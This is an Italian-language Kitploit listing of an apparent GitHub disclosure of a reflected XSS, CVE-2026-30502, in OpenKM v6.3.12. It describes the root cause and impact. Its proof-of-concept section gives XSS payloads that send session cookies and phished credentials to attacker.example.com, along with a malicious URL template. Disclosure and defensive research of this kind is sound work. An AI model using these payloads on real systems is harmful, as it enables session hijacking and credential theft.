Skip to content
KitploitKITPLOIT
StrumentiBlog
Log in
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

FeedContattoPrivacy© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2026-30502-OpenKM-6.3.12-Reflected-XSS — Documentazione e proof-of-concept per CVE-2026-30502, una vulnerabilità XSS riflessa in OpenKM v6.3.12. Include analisi tecnica, causa principale, valutazione dell'impatto e indicazioni di remediation per ricercatori di sicurezza e penetration tester. | Kitploit
Strumenti/GitHubGitHub/dharmstm/cve-2026-30502-openkm-6.3.12-reflected-xss
Strumenti di PhishingAnalisi delle VulnerabilitàSfruttamento di Applicazioni WebPenetration TestingPaper e RicercaApprendimento e Formazione
GitHubdharmstm/cve-2026-30502-openkm-6.3.12-reflected-xss

CVE-2026-30502-OpenKM-6.3.12-Reflected-XSS

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

Documentazione e proof-of-concept per CVE-2026-30502, una vulnerabilità XSS riflessa in OpenKM v6.3.12. Include analisi tecnica, causa principale, valutazione dell'impatto e indicazioni di remediation per ricercatori di sicurezza e penetration tester.

Vedi Repository
193 mesi faNon ancora revisionato

🛡️ CVE-2026-30502 — XSS riflesso in OpenKM v6.3.12

CVE Badge OpenKM Type Disclosure Status

Scoperta e segnalata da Dharmendra Kumar — Ricercatore di Sicurezza

Cybersecurity | Penetration Testing | Ricerca di Vulnerabilità | Divulgazione Responsabile


📌 Sommario

  • Panoramica
  • Dettagli CVE
  • Prodotto Interessato
  • Descrizione della Vulnerabilità
  • Analisi della Causa Principale
  • Impatto e Valutazione del Rischio
  • Proof of Concept (PoC)
  • Rimedio e Raccomandazioni
  • Cronologia della Divulgazione
  • Riferimenti
  • Informazioni sul Ricercatore

🔍 Panoramica

Questo repository documenta la divulgazione responsabile di CVE-2026-30502, una vulnerabilità di Cross-Site Scripting (XSS) riflesso identificata in OpenKM v6.3.12 — un sistema di gestione documentale open source ampiamente diffuso, utilizzato in ambienti enterprise e governativi.

La vulnerabilità risiede nel parametro Content, che riflette l'input fornito dall'utente nel browser senza un'adeguata sanificazione o codifica dell'output. Un attaccante può creare un URL malizioso contenente JavaScript incorporato e indurre tramite social engineering una vittima a cliccarci sopra, causando l'esecuzione di script nella sessione del browser della vittima.

⚠️ Gravità: Media–Alta | Vettore di attacco: Rete | Privilegi richiesti: Nessuno | Interazione dell'utente: Richiesta


📋 Dettagli CVE

CampoDettagli
ID CVECVE-2026-30502
ProdottoOpenKM
Versione interessatav6.3.12
Classe di vulnerabilitàCross-Site Scripting riflesso (XSS)
Parametro vulnerabileContent
CWECWE-79: Neutralizzazione impropria dell'input durante la generazione di pagine web
Vettore CVSSCVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:L/A:N
GravitàMedia–Alta
EditoreMITRE CVE Program
RicercatoreDharmendra Kumar
Tipo di divulgazioneResponsabile / Coordinata

📦 Prodotto Interessato

OpenKM è un sistema di gestione documentale (DMS) gratuito e open source che fornisce un'interfaccia web per gestire, verificare e distribuire documenti aziendali. È utilizzato da aziende, enti governativi e istituzioni educative in tutto il mondo.

  • Nome del prodotto: OpenKM Document Management System
  • Versione interessata: v6.3.12
  • Sito web del fornitore: https://www.openkm.com
  • Categoria: Sistema di gestione documentale (DMS)
  • Linguaggio / Stack: Java (JSP / Spring Framework)

🧨 Descrizione della Vulnerabilità

È stata identificata una vulnerabilità di Cross-Site Scripting (XSS) riflesso in OpenKM v6.3.12 tramite il parametro Content. L'applicazione non valida né codifica l'input fornito dall'utente prima di rifletterlo nel corpo della risposta HTTP, consentendo l'iniezione e l'esecuzione di JavaScript arbitrario nel browser della vittima.

A differenza dello Stored XSS, il payload di un XSS riflesso non viene persistito nel database — viaggia invece all'interno di un URL appositamente creato. L'attacco si basa sull'induzione della vittima a cliccare un link malizioso (distribuito via email, social media o campagne di phishing), dopo di che il payload viene eseguito silenziosamente nel browser con il contesto di sessione della vittima.

Flusso dell'Attacco

Attacker crafts malicious URL
        │
        ▼
Victim clicks the link (phishing / social engineering)
        │
        ▼
Browser sends GET/POST request with payload in `Content` parameter
        │
        ▼
OpenKM reflects unsanitized input directly into HTML response
        │
        ▼
Browser parses & executes injected JavaScript
        │
        ▼
Session hijacked / credentials harvested / account compromised

🔬 Analisi della Causa Principale

La vulnerabilità deriva dal mancato rispetto da parte dell'applicazione dei controlli di sicurezza input-output sul parametro Content:

DebolezzaDescrizione
❌ Nessuna validazione dell'inputIl parametro Content accetta caratteri HTML/JavaScript grezzi senza restrizioni o filtri
❌ Nessuna codifica dell'outputI valori riflessi vengono scritti nella risposta HTML senza codifica delle entità HTML
❌ Header CSP mancanteNessuna Content Security Policy viene applicata per bloccare l'esecuzione di script inline
❌ Nessun cookie HTTPOnlyI token di sessione sono accessibili via JavaScript, consentendo il furto diretto dei cookie
User-Crafted URL ──► Content Parameter ──► [NO Validation]
       ──► Reflected in HTML Response ──► [NO Encoding]
              ──► Browser Executes Script ──► Account Compromised

💥 Impatto e Valutazione del Rischio

Lo sfruttamento riuscito di questa vulnerabilità può portare a:

RischioDescrizione
🍪 Dirottamento della sessioneRubare i token di sessione attivi tramite document.cookie per impersonare la vittima
🔑 Raccolta di credenzialiIniettare overlay di login falsi per catturare nomi utente e password in chiaro
📤 Divulgazione di informazioniEsfiltrare contenuti documentali sensibili, dati utente o configurazioni interne
🎣 Attacchi di phishingServire pagine false convincenti ospitate all'interno del dominio fidato di OpenKM
👤 Compromissione dell'accountEseguire azioni autenticate arbitrarie per conto della vittima
⚙️ Azioni non autorizzateModificare, eliminare o esfiltrare documenti all'interno del DMS
🖥️ Distribuzione di malwareReindirizzare le vittime a siti controllati dall'attaccante che ospitano download maliziosi

🧪 Proof of Concept (PoC)

⚠️ Disclaimer: Le seguenti informazioni sono condivise esclusivamente a scopo educativo e di ricerca sulla sicurezza, nel rispetto dei principi della divulgazione responsabile. Non testare o utilizzare quanto descritto su sistemi che non possiedi o per i quali non hai ricevuto un'esplicita autorizzazione scritta.

Esempi di Payload (Generici)

// Basic execution proof
<script>alert('CVE-2026-30502 - XSS by Dharmendra Kumar')</script>

// Session cookie exfiltration
<script>document.location='https://attacker.example.com/steal?c='+document.cookie</script>

// Credential phishing overlay
<script>
  var d=document.createElement('div');
  d.innerHTML='<form action="https://attacker.example.com/log" method="POST">'
    +'<input name="u" placeholder="Username"/>'
    +'<input name="p" type="password" placeholder="Password"/>'
    +'<button>Sign In</button></form>';
  document.body.prepend(d);
</script>

Struttura dell'URL Malizioso Creato

https://target-openkm-instance/[vulnerable-endpoint]?Content=<script>alert(1)</script>

Passaggi per la Riproduzione

Scarica lo strumento